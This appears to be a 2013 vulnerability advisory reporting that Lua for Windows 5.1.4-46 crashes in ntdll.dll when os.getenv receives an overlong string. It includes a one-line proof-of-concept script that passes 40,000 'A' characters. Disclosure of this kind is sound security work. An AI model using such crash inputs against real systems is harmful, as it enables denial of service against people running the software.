Lua for Windows (LfW) V5.1.4-46 => os.getenv ntdll.dll Crash

2013.02.14

Credit: DevilTeam

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Lua for Windows (LfW) V5.1.4-46 => os.getenv ntdll.dll Crash
found by:
devilteam.pl
contact: info@devilteam.pl
====================================================================
Overview
Lua for Windows is a 'batteries included environment' for the Lua scripting language on Windows.
Lua for Windows (LfW) combines Lua binaries, Lua libraries with a Lua-capable editor in a single install package for the Microsoft Windows operating system. LfW contains everything you need to write, run and debug Lua scripts on Windows. A wide variety of libraries and examples are included that are ready to use with Microsoft Windows. LfW runs on Windows 2000 and newer versions of Windows. Lua and its associated libraries are also available for other operating systems, so most scripts will be automatically cross-platform.
Download:
http://code.google.com/p/luaforwindows/downloads/list
====================================================================
PoC:
dt.lua (1 line):
os.getenv(string.rep("A", 40000))
====================================================================
greetz:
cxsec.org
CXsecurity

References:

http://code.google.com/p/luaforwindows/downloads/list

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lua for Windows (LfW) V5.1.4-46 => os.getenv ntdll.dll Crash

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.